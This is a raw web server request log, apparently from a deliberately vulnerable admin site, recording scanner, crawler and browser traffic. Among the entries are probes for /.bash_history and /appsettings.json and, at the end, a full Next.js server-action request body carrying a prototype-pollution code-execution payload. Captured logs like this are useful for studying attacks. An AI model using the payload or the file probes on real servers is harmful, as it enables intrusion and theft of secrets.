RemoteAddr: 172.30.0.12:60970
Path: /login
URL: /login
Method: GET
[2026-03-12 14:26:00] === HTTP Request ===
===================
Sec-Fetch-Dest: script
Sec-Ch-Ua-Platform: "macOS"
Priority: u=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
X-Forwarded-For: 203.128.94.60
Via: 2.0 Caddy
Sec-Fetch-Mode: no-cors
Accept-Language: en,ru;q=0.9
X-Forwarded-Proto: https
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Cookie: user_id=1; auth=sess_1773323198501875199
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60970
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-12 14:25:59] === HTTP Request ===
===================
Sec-Fetch-Dest: script
Priority: u=1
Accept-Language: en,ru;q=0.9
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 203.128.94.60
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
Cookie: user_id=1; auth=sess_1773323198501875199
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60946
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-12 14:25:59] === HTTP Request ===
===================
X-Forwarded-Proto: https
Sec-Fetch-Dest: style
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Accept-Encoding: gzip, deflate, br, zstd
Accept: text/css,*/*;q=0.1
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 203.128.94.60
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Priority: u=0
Cookie: user_id=1; auth=sess_1773323198501875199
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Mobile: ?0
Accept-Language: en,ru;q=0.9
Referer: https://admin.vulnberries.ru/
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60946
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-12 14:25:59] === HTTP Request ===
[2026-03-12 14:25:59] Main page accessed - IP: 172.30.0.12:60946
===================
Cookie: user_id=1; auth=sess_1773323198501875199
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Via: 2.0 Caddy
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Accept-Language: en,ru;q=0.9
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 203.128.94.60
Sec-Fetch-User: ?1
Sec-Ch-Ua-Platform: "macOS"
Priority: u=0, i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60946
Path: /
URL: /
Method: GET
[2026-03-12 14:25:59] === HTTP Request ===
[2026-03-12 13:05:13] Main page accessed - IP: 178.128.30.185:60830
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.128.30.185:60830
Path: /
URL: /
Method: GET
[2026-03-12 13:05:13] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.136:39252
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-12 12:43:13] === HTTP Request ===
[2026-03-12 12:43:11] Main page accessed - IP: 85.142.100.136:39244
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.136:39244
Path: /
URL: /
Method: GET
[2026-03-12 12:43:11] === HTTP Request ===
[2026-03-12 12:28:39] Main page accessed - IP: 176.32.195.85:60021
===================
Accept: */*
User-Agent: Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 176.32.195.85:60021
Path: /
URL: /
Method: GET
[2026-03-12 12:28:39] === HTTP Request ===
[2026-03-12 12:06:06] Main page accessed - IP: 176.65.149.45:44588
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:44588
Path: /
URL: /
Method: GET
[2026-03-12 12:06:06] === HTTP Request ===
[2026-03-12 10:19:01] Main page accessed - IP: 176.65.149.45:33190
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:33190
Path: /
URL: /
Method: GET
[2026-03-12 10:19:01] === HTTP Request ===
===================
Connection: keep-alive
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/login
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.141.77.200:62883
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-12 10:07:04] === HTTP Request ===
[2026-03-12 10:07:03] Login page accessed - IP: 178.141.77.200:62883
===================
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.141.77.200:62883
Path: /login
URL: /login
Method: GET
[2026-03-12 10:07:03] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Connection: keep-alive
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.141.77.200:62883
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-12 10:07:03] === HTTP Request ===
===================
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.141.77.200:49673
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-12 10:07:03] === HTTP Request ===
===================
Connection: keep-alive
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.141.77.200:63248
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-12 10:07:03] === HTTP Request ===
[2026-03-12 10:07:02] Main page accessed - IP: 178.141.77.200:63248
===================
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.141.77.200:63248
Path: /
URL: /
Method: GET
[2026-03-12 10:07:02] === HTTP Request ===
[2026-03-12 09:40:36] Main page accessed - IP: 24.199.126.56:58924
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 24.199.126.56:58924
Path: /
URL: /
Method: GET
[2026-03-12 09:40:36] === HTTP Request ===
[2026-03-12 09:32:15] Main page accessed - IP: 34.62.147.13:46110
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.62.147.13:46110
Path: /
URL: /
Method: GET
[2026-03-12 09:32:15] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Chrome (AppleWebKit/537.1; Chrome50.0; Windows NT 6.3) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.155.69.130:33220
Path: /nobody/favicon.ico
URL: /nobody/favicon.ico
Method: GET
[2026-03-12 09:22:57] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Chrome (AppleWebKit/537.1; Chrome50.0; Windows NT 6.3) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.155.69.130:33206
Path: /image/lgbg.jpg
URL: /image/lgbg.jpg
Method: GET
[2026-03-12 09:22:54] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Chrome (AppleWebKit/537.1; Chrome50.0; Windows NT 6.3) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.155.69.130:33194
Path: /login.rsp
URL: /login.rsp
Method: GET
[2026-03-12 09:22:50] === HTTP Request ===
===================
User-Agent: Chrome (AppleWebKit/537.1; Chrome50.0; Windows NT 6.3) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.155.69.130:59350
Path: /skin/default_1/images/logo.png
URL: /skin/default_1/images/logo.png
Method: GET
[2026-03-12 09:22:47] === HTTP Request ===
[2026-03-12 09:22:47] Main page accessed - IP: 45.155.69.130:59340
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Chrome (AppleWebKit/537.1; Chrome50.0; Windows NT 6.3) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.155.69.130:59340
Path: /
URL: /
Method: GET
[2026-03-12 09:22:47] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Chrome (AppleWebKit/537.1; Chrome50.0; Windows NT 6.3) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.155.69.130:59332
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-12 09:22:46] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:60482
Path: /jars
URL: /jars
Method: GET
[2026-03-12 08:43:02] === HTTP Request ===
[2026-03-12 08:06:41] Main page accessed - IP: 104.155.11.101:34404
===================
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Connection: keep-alive
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 104.155.11.101:34404
Path: /
URL: /
Method: GET
[2026-03-12 08:06:41] === HTTP Request ===
===================
X-Forwarded-Proto: https
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/cabinet
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.227.37
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42092
Path: /static/cabinet.js
URL: /static/cabinet.js
Method: GET
[2026-03-12 07:04:27] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Referer: https://admin.vulnberries.ru/defects
Accept: */*
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.227.37
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42092
Path: /static/defects.js
URL: /static/defects.js
Method: GET
[2026-03-12 07:04:26] === HTTP Request ===
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.227.37
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/salary
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42092
Path: /static/salary.js
URL: /static/salary.js
Method: GET
[2026-03-12 07:04:25] === HTTP Request ===
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/goods
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.227.37
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42092
Path: /static/goods.js
URL: /static/goods.js
Method: GET
[2026-03-12 07:04:24] === HTTP Request ===
[2026-03-12 07:04:23] Logs page accessed - IP: 172.30.0.12:42092
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-For: 74.7.227.37
Via: 2.0 Caddy
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42092
Path: /logs
URL: /logs
Method: GET
[2026-03-12 07:04:23] === HTTP Request ===
[2026-03-12 07:04:22] Login page accessed - IP: 172.30.0.12:42092
===================
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Openai-Host-Hash: 867116608
X-Forwarded-For: 74.7.227.37
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42092
Path: /login
URL: /login
Method: GET
[2026-03-12 07:04:22] === HTTP Request ===
[2026-03-12 07:04:20] Cabinet page accessed - user_id: , IP: 172.30.0.12:42092
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.227.37
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42092
Path: /cabinet
URL: /cabinet
Method: GET
[2026-03-12 07:04:20] === HTTP Request ===
[2026-03-12 07:04:18] Defects page accessed - IP: 172.30.0.12:42092
===================
Referer: https://admin.vulnberries.ru/
Accept: */*
X-Openai-Host-Hash: 867116608
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.227.37
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42092
Path: /defects
URL: /defects
Method: GET
[2026-03-12 07:04:18] === HTTP Request ===
===================
Accept-Encoding: gzip, br, deflate
Accept: */*
X-Openai-Host-Hash: 867116608
X-Forwarded-For: 74.7.227.37
Referer: https://admin.vulnberries.ru/
Via: 2.0 Caddy
From: gptbot(at)openai.com
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42092
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-12 07:04:17] === HTTP Request ===
===================
Accept-Encoding: gzip, br, deflate
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.227.37
Via: 2.0 Caddy
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42092
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-12 07:04:14] === HTTP Request ===
[2026-03-12 07:04:13] Goods page accessed - IP: 172.30.0.12:42092
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
From: gptbot(at)openai.com
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
Accept: */*
X-Forwarded-For: 74.7.227.37
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, br, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42092
Path: /goods
URL: /goods
Method: GET
[2026-03-12 07:04:13] === HTTP Request ===
[2026-03-12 07:04:07] Salary page accessed - IP: 172.30.0.12:42092
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.227.37
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42092
Path: /salary
URL: /salary
Method: GET
[2026-03-12 07:04:07] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.227.37
Referer: https://admin.vulnberries.ru/
X-Forwarded-Proto: https
Via: 2.0 Caddy
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Openai-Host-Hash: 867116608
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42092
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-12 07:04:04] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.230.10
Accept-Encoding: gzip, br, deflate
X-Openai-Host-Hash: 867116608
Via: 2.0 Caddy
From: oai-searchbot(at)openai.com
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42092
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-12 07:03:59] === HTTP Request ===
[2026-03-12 07:03:58] Main page accessed - IP: 172.30.0.12:42092
===================
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.227.37
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42092
Path: /
URL: /
Method: GET
[2026-03-12 07:03:58] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50023
Path: /.bash_history
URL: /.bash_history
Method: GET
[2026-03-12 06:25:55] === HTTP Request ===
[2026-03-12 05:28:42] Main page accessed - IP: 165.245.186.165:37516
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.245.186.165:37516
Path: /
URL: /
Method: GET
[2026-03-12 05:28:42] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50017
Path: /appsettings.json
URL: /appsettings.json
Method: GET
[2026-03-12 05:24:57] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.154.182.174:56908
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-03-12 05:20:16] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.154.182.174:56906
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-12 05:20:15] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.154.182.174:56794
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-12 05:20:15] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.154.182.174:56652
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-12 05:20:15] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.154.182.174:56488
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-12 05:20:14] === HTTP Request ===
[2026-03-12 05:20:14] Main page accessed - IP: 165.154.182.174:56376
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/560.44 (KHTML, like Gecko) Chrome/85.0.1680 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.154.182.174:56376
Path: /
URL: /
Method: GET
[2026-03-12 05:20:14] === HTTP Request ===
[2026-03-12 05:19:46] Main page accessed - IP: 165.154.41.232:49486
===================
Accept: */*
User-Agent: curl/7.29.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 165.154.41.232:49486
Path: /
URL: /
Method: GET
[2026-03-12 05:19:46] === HTTP Request ===
[2026-03-12 04:54:23] Main page accessed - IP: 159.65.13.145:60558
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 159.65.13.145:60558
Path: /
URL: /
Method: GET
[2026-03-12 04:54:23] === HTTP Request ===
[2026-03-12 04:26:20] Main page accessed - IP: 147.185.132.78:61688
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 147.185.132.78:61688
Path: /
URL: /
Method: GET
[2026-03-12 04:26:20] === HTTP Request ===
===================
------WebKitFormBoundaryx350466665146--
------WebKitFormBoundaryx350466665146
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx350466665146
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 83535+true+4195447;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx350466665146
X-Nextjs-Html-Request-Id: ilovepoop_350466665146
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx350466665146
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
